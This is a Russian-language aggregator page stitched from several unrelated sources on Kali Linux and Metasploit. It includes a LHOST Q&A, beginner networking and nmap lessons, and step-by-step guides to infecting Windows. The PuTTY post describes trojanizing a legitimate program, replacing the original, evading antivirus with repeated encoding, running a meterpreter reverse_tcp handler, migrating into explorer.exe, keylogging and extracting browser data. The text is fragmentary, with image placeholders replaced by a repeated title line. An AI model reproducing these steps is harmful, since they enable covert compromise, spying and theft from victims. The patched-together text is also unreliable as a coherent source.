как узнать lhost kali linux

Краткое руководство: Как взломать Windows с Kali Linux

Главное меню » Операционная система Linux » Краткое руководство: Как взломать Windows с Kali Linux

как узнать lhost kali linux

Детали исходной машины:

Целевая машина, используемая для взлома:

Payload представляет собой программу, которая похожа как вирус или троян, которая выполняется на удаленной машине для цели взлома. Для создания полезной нагрузки используется команды написанные ниже, которые будут взламывать windows с Kali Linux.

С помощью команды ls мы подтвердили, что наша программа Payload успешно создана в указанном месте.

Шаг 2: Запустите команду mfsconsole, которая запустит запрос msf.

Шаг 3: Для использования мы использовали следующие детали:

Теперь дайте следующую команду в строке msf “use exploit/multi/handler

Затем дайте команду “set payload windows/meterpreter/reverse_tcp” в следующей строке:

Теперь установите локальный IP и порт, используя команду lhost и lport, как показано ниже:

и, наконец, используйте команду.

Теперь вам нужно выполнить команду “program.exe” на машине с Windows, как только она выполнится на целевой машине, вы можете в состоянии установить сессию meterpreter. Просто наберите SysInfo, чтобы получить детали взломанной машины с Windows.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Источник

How to find LHOST?

This is a problem that I have beaten my head over for quite some time.

Here is the problem: I can’t figure out my LHOST, when I try to exploit the meterpreter payload all I get is a failed to bind error( I think this is because My LHost is wrong)

I have tried to do the following things:

1) use ifconfig in kali linux, however none of the things it shows seem to be my LHOST:

2) I tried cmd ipconfig and used some IP’s from there (mainly the ethernet and virtualbox hosts)

3)I typed ip into google (it was the same in kali and windows)

4) I also looked in my setting(in kali linux) and used the ip from there.

5) I looked A LOT on the internet but I could not find anything

ps:maybe I am using the wrong ports? pps: my kali linux says it has a wired connection

как узнать lhost kali linux

3 Answers 3

Note: This is different for internal victims(On ur own LAN)

For external victims, LHOST of the payload should be your public IP. Reason is that LHOST is embedded within the first stage payload. It must be able to connect back to the handler which means if the victim is outside the LAN, the payload stager needs a routable IP address to reach the handler. I will call the LHOST in payload as LHOST-PAYLOAD. Now suppose you have used port 443 as the LPORT. For the sake of understanding, I will refer to LPORT in payload as LPORT-PAYLOAD. LHOST of the multi/handler should be 0.0.0.0 or the internal IP. I wil call the LHOST in handler as LHOST-HANDLER. Use LPORT 443 in the handler. For the sake of understanding I will refer to this payload as LPORT-HANDLER.

LHOST-PAYLOAD = Public IP LPORT-HANDLER = LPORT-PAYLOAD LHOST-HANDLER = 0.0.0.0 or internal IP of Kali

Which means any incoming connection with destination port 443 should be forwarded to the Kali machine where the handler is looking for incoming connection on port 443. Hence you are connected.

The LHOST is simply the ip address that is reachable from your attacker. I’m going to assume that you are using a reverse shell payload or something that needs to connect back to you, otherwise the LHOST is not needed.

If you are on the same network, 10.0.2.15 should work. If target needs the internet to connect to you, you need your public ip address. If you determine that you need the public ip address and you are behind a router, you may need to configure port forwarding, as the public IP is usually assigned to your router only.

So make sure to look into this.

Lastly, it could be a firewall that’s messing you up and not the LHOST value. Go make sure that your ingress rules allow for connection to whatever port you put into. Although this wouldn’t really cause you a bind error.

Источник

Этичный хакинг с Михаилом Тарасовым (Timcore)

Блог об Этичном Хакинге

#1 Kali Linux для начинающих. Урок 1 — Основы сетей.

В этом уроке мы изучим основы работы с сетью и научимся находить информацию о сети, такую как наш ip адрес, шлюз сервер и так далее.

Мы научимся определять, какие сервисы запущены на нашей машине.

После взлома линукс сервера, вам нужно выяснить, есть ли у него другие сетевые интерфейсы, и если они есть, то, как правило, это означает, что этот сервер подключен к двум различным сетям, и его можно использовать, чтобы попасть в другую сеть или другой сегмент сети. В корпоративной сети разделение сетей, в которых находится чувствительная информация, чувствительные серверы, является частой практикой.

Также вам нужно знать, с какими dns серверами общается взломанный сервер, и через какой шлюз. В этом случае вы будете лучше понимать, в какой сети находитесь.

Итак, при подключении к сети нас интересует несколько моментов, а именно, какие используются сетевые интерфейсы (проводная сеть, беспроводная сеть, vpn-сеть). Какой у нас ip адрес, шлюз, и по какому маршруту идет наш трафик.

В линуксе сетевые интерфейсы называются следующим образом. Кстати, если вы не знаете что такое сетевой интерфейс, на самом деле это то, каким способом ваш компьютер подключен к сети. Если ваш компьютер подключен к сети через сетевой кабель, то оборудование, через которое он выходит в сеть, называется сетевым адаптером. У сетевого адаптера есть интерфейс с ip адресом, и если это проводная сеть, то интерфейс называется eth0. Это справедливо, если в вашей сети всего один адаптер. Если есть и другие, то они будут называться eth1, eth2 и т. д. Если у вас используется беспроводная сеть, то интерфейс называется wlan0. Lo — это лупбэк адрес, также известный как com или localhost. Его ip адрес 127.0.0.1. Лупбэк адресу всегда соответсвует этот ip адрес.

Переходим в Kali Linux. Чтобы узнать свой ip адрес, то используем команду ifconfig. Как видите тут указан мой ip адрес:

как узнать lhost kali linux

Допустим, мне нужно указать мой dns сервер, и если вы забыли или не знаете что такое dns сервер, то поищите эту информацию в интернете. Думаю ответ не заставит вас долго ждать.

как узнать lhost kali linux

Давайте проверим ip-адрес с помощью команды traceroute timcore.ru:

как узнать lhost kali linux

Для остановки данной команды, используйте комбинацию клавиш Ctrl+C.

Когда вы взломали сервер, нужно знать, какие сервисы на нем запущены, а также какие компьютеры или сервера общаются с этими сервисами. Это можно сделать с помощью команды netstat. Как правило с ней используются опции -a — отображает все запущенные сервисы, -n — это адрес с цифрами. -t — отображает tcp, то есть протокол tcp. -p — отображает название программы, которая запустила этот сервис. Попробуйте эту команду самостоятельно.

Источник

Kali Linux. Возможности Meterpreter. Часть 1.

Начнём. Возможно, это Часть 1.

Kali Linux — GNU/Linux-LiveCD, возникший как результат слияния WHAX и Auditor Security Collection. Проект создали Мати Ахарони (Mati Aharoni) и Макс Мозер (Max Moser). Предназначен прежде всего для проведения тестов на безопасность.

Metasploit Framework — удобная платформа для создания и отладки эксплойтов. Кроме того, проект включает в себя базу опкодов, архив шеллкодов и информацию по исследованиям компьютерной безопасности.

Хакер: Kali Linux 2017.1

Жертва: Windows 10 1703 x64

Процесс создания заражённого файла:

1. Внезапно нам нужен файл. В моём примере будет putty, хотя можно юзануть и exe какого-нибудь хрома, например, и потом заражённый файл вернуть на место взамен оригинального. Вы ничего не видели и не знаете

2. Переходим в папку с файлом, либо будем писать полный путь до файла, что не круто.

как узнать lhost kali linux

Поясню, что тут есть:

как узнать lhost kali linux

У меня тут 10 итераций(-i 10).

Данный файл любым методом переносится на комп жертвы и запускается или удаляется антивирусом сразу после переноса

35/64, но для тестов сгодится. Если шифровать разными шифрованиями тыщу раз, то будет меньше палева.

как узнать lhost kali linux

Запускаем metasploit framework и ждём.

Команды выглядят так:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > show options (показывает, что можно настроить)

как узнать lhost kali linux

Пишем «set LHOST 192.168.0.101», в моём случае. У вас, ясное дело, ваш ip Kali Linux.

LHOST и LPORT должны быть теми, которые мы указали в msfvenom.

Подразумевается, что жертва уже запустила файл и у нас есть доступ. Иначе просто не откроется сессия.

Заражённая программа внешне ничем не отличается от оригинала:

как узнать lhost kali linux

Обычная программа. Только закрывается через несколько секунд.

как узнать lhost kali linux

На ноуте в это время пишем exploit и видим это:

как узнать lhost kali linux

«meterpreter > » означает, что мы в системе и можем делать что угодно, но перед этим надо перекинуть «заражённый процесс в другой процесс». Чтобы путти мог закрыться и не закрыл вместе с собой сессию.

Пишем ps и видим список процессов. Надо выбрать тот, который закрывать не будут. Например, проводник, который именуется explorer.exe

как узнать lhost kali linux

PID у него 3044. 2800 это PPID и он нам не нужен.

пишем «migrate 3044» и готово.

как узнать lhost kali linux

Мы в системе. Начинается самое интересное. Сверху текст, снизу картинка. Как и везде.

Пойдём от простого к интересному. Некоторую дичь затрагивать не буду. Она интересна, вероятно, каким-то редким людям и в некоторых случаях.

1. help. Выдаст возможные команды, но далеко не все. Даже показывать не буду, там крайне мало инфы.

2. sysinfo. и так понятно, что даёт

как узнать lhost kali linux

как узнать lhost kali linux

как узнать lhost kali linux

6. Команды для вебкамеры:

Не смогу показать, нет вебкамеры и вряд-ли теперь будет.

Ловит только английские буквы

ololoo, test keylogger

как узнать lhost kali linux

Неинтересное закончилось, пора переходить к интересному:

Команды вида «run *что-то*». Они уже более интересные. Тут уже нет порядка крутости, тут всё годно. Может быть, когда-нибудь, я проверю все команды и сделаю пост на пикабу. Прям такой «тру обзор», но это не точно.

как узнать lhost kali linux

Всё я показывать не буду, там очень много. Пост не резиновый.

Ах да, иногда может писать, что скрипт не поддерживается в meterpreter. Это дубликаты другого скрипта, который там напишут.

Открыть можно через SQLite Database Browser, который есть в том же Кали, хоть это и текстовый документ. Надо только в программе выбрать «All files».

Файлы Preference и Decrypted открываются в текстовом редакторе.

Источник

Этичный хакинг с Михаилом Тарасовым (Timcore)

Блог об Этичном Хакинге

#36 Kali Linux для начинающих. Сканируем порты с помощью Kali Linux.

Теперь, когда я узнал айпи-адрес нашей машины, мне нужно узнать, какие сервисы на ней работают, и какие порты открыты. Для этого мы воспользуемся нашим инструментом, который называется «nmap».

Давайте я покажу Вам пару новых опций «nmap».

Первая – это опция «-v», т.е подробный режим, где мы сообщаем нашему инструменту, что нужно выводить больше информации. Если Вы запустите «nmap» с опцией «-v», то довольно часто Вы можете наблюдать пустой экран. Также можно воспользоваться опциями: «-vv» «-vvv». Чем больше «v», тем больше выводится информации на экране.

Далее идет опция «-p-» или «-p 0-65535». Она означает сканирование всех tcp-портов. Далее идет опция «-A», которая отображает версию операционной системы, и уже можно сказать, что это стадия разведки. Для вывода большего перечня информации мы конечно же будем использовать ее, но она занимает намного больше времени, чем простое сканирование. Так как мы хотим взломать машину, нам нужно будет узнать как можно больше информации о ней, поэтому мы используем опцию «-A».

Далее пишем ip-адрес нашей цели, который у меня выглядит как: «192.168.15.131». Также я хочу, чтобы у меня был отчет по окончании сканирования, и у «nmap» есть 3 типа вывода. Обычный вывод, похожий на текстовый файл. Это просто копирование того, что выводится на экран. Также есть вывод в файл «gnmap». И последний третий вывод – это xml, который подается на вход другим инструментам. Сейчас я хочу сохранить вывод файлов в трех форматах: nmap, gnmap и xml. Нам нужно дописать команду опциями «–oA”, и в конце назовем файл «metasploitable2» и нажмем Enter.

В итоге у нас получится команда: «nmap –v –p 0-65535 –A 192.168.15.131 –oA metasploitable2»:

как узнать lhost kali linux

Поскольку мы выбрали достаточно много опций, которые выводят много информации, нам остается только ждать завершения сканирования. И это все всего лишь один ip-адрес. Сканирование может занять достаточное количество времени. Теперь представьте на реальном примере, сколько нужно ждать, если у Вас не один ip-адрес, а 100 или 200. В этом примере сканирование у меня прошло быстро, и мне не пришлось его останавливать:

как узнать lhost kali linux

Также рассмотрим опцию «-T», которая позволяет сканировать айпи адреса в тихом режиме, чтобы не сработали системы обнаружения. У нее есть параметр от 1 до 5, где цифра 1 – это очень медленное сканирование.

Не забываем, что мы указывали создание трех файлов-отчетов с разными расширениями. Они находятся в моей текущей директории:

как узнать lhost kali linux

Давайте упорядочим наш список файлов, перенеся их в отдельную директорию:

как узнать lhost kali linux

Команды должны быть Вам уже известны.

Для просмотра файлов можно использовать команду «cat» или «less», для постепенного просмотра файлов:

как узнать lhost kali linux

Итак, мы просканировали наш ip-адрес и выявили наличие множества открытых портов, и большое количество сервисов.

Источник

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *